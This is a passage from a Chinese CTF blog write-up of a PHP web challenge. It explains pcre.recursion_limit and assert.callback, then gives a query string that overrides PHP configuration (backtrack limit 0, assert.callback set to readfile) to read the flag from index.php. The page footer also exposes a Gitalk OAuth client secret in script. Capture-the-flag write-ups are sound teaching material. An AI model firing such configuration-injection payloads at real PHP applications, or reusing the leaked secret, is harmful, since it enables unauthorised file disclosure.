<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">pcre.recursion_limit是什么</span><br><span class="line"></span><br><span class="line">ChatGPT</span><br><span class="line">pcre.recursion_limit是一个配置项，它用于限制PCRE（Perl Compatible Regular Expressions）引擎在匹配过程中的递归深度。</span><br><span class="line"></span><br><span class="line">PCRE是一个功能强大的正则表达式库，广泛用于各种编程语言中，例如PHP。在使用PCRE引擎进行正则表达式匹配时，有些复杂的模式可能会导致递归的发生，即正则表达式引擎在尝试匹配时会自动进入嵌套的子调用。</span><br><span class="line"></span><br><span class="line">pcre.recursion_limit配置项用于限制这种递归的深度，以避免在处理过程中出现无限递归的情况。它指定了PCRE引擎在匹配过程中可以进行的最大递归层数。如果达到了该限制，引擎会中止匹配并返回一个错误。</span><br><span class="line"></span><br><span class="line">通过调整pcre.recursion_limit的值，可以控制PCRE引擎在匹配过程中所允许的递归深度，以满足具体的需求和安全性考虑。不同的语言和环境可能有不同的默认值和最大值限制。</span><br></pre></td></tr></table></figure>
<p>我们可以通过设置<code>pcre.recursion_limit</code>的值来限制递归深度，我们将其设置为0，则<code>preg_match</code>就会出错，断言失败</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612201621811.png" alt="image-20230612201621811"></p>
<p>没什么用，我们继续往下翻配置</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612201800630.png" alt="image-20230612201800630"></p>
<p>发现<code>assert.callback</code> 另一个关键配置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">assert.callback 是一个 PHP 配置选项，用于指定一个回调函数，在断言失败时被调用。断言是一种用于检查代码正确性的技术，通常用于在开发和测试过程中检测代码中的错误和异常情况。在 PHP 中，断言可以通过 assert() 函数来实现。</span><br><span class="line"></span><br><span class="line">当 assert() 函数检查到一个失败的断言时，如果设置了 assert.callback 选项，则会调用指定的回调函数，并将断言的信息作为参数传递给它。回调函数可以是一个 PHP 函数或方法的名称，也可以是一个匿名函数。</span><br></pre></td></tr></table></figure>
<p>设置<code>assert.callback</code>我们的函数成功被执行，并且第一个参数是文件名，已知flag是以字符串的形式存在<code>index.php</code>中，我们可以通过读取<code>index.php</code>来读取flag。</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612202614285.png" alt="image-20230612202614285"></p>
<p>还有一个限制就是函数的参数类型需要大于等于3，否则会报错，如<code>highlight_file</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612202817364.png" alt="image-20230612202817364"></p>
<p>通过翻文档的文件操作函数列表发现</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">readfile(string $filename, bool $use_include_path &#x3D; false, ?resource $context &#x3D; null): int|false</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612202944776.png" alt="image-20230612202944776"></p>
<p>最后构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?flag&#x3D;SEE&#123;FAKE_FLAG&#125;&amp;debug&#x3D;a&amp;config[pcre.backtrack_limit]&#x3D;0&amp;config[assert.callback]&#x3D;readfile</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612203042917.png" alt="image-20230612203042917"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/05/30/%E8%BD%AF%E8%B7%AF%E7%94%B1%E6%8D%A3%E9%BC%93%E9%9A%8F%E6%89%8B%E8%AE%B0/" rel="prev" title="软路由捣鼓随手记">
      <i class="fa fa-chevron-left"></i> 软路由捣鼓随手记
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SEECTF-writeups-web-challs"><span class="nav-number">1.</span> <span class="nav-text">SEECTF writeups - web challs</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Express-JavaScript-Security"><span class="nav-number">1.1.</span> <span class="nav-text">Express JavaScript Security</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#file-uploader-1"><span class="nav-number">1.2.</span> <span class="nav-text">file uploader 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#file-uploader-2"><span class="nav-number">1.3.</span> <span class="nav-text">file uploader 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sourceful-Guessless-Web"><span class="nav-number">1.4.</span> <span class="nav-text">Sourceful Guessless Web</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="L1ao"
      src="/images/touxian2.jpg">
  <p class="site-author-name" itemprop="name">L1ao</p>
  <div class="site-description" itemprop="description">CTFer</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:staryki@vip.qq.com" title="E-Mail → mailto:staryki@vip.qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">L1ao</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '78387a75ae4ac2ce4920',
      clientSecret: '57cd8957a1538817153b2368513850829cd3676e',
      repo        : 'blogcomment',
      owner       : 'L1aovo',
      admin       : ['L1aovo'],
      id          : '2111ea3aba284f5a1217175d95ce3286',
        language: 'zh-CN',
      distractionFreeMode: false
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
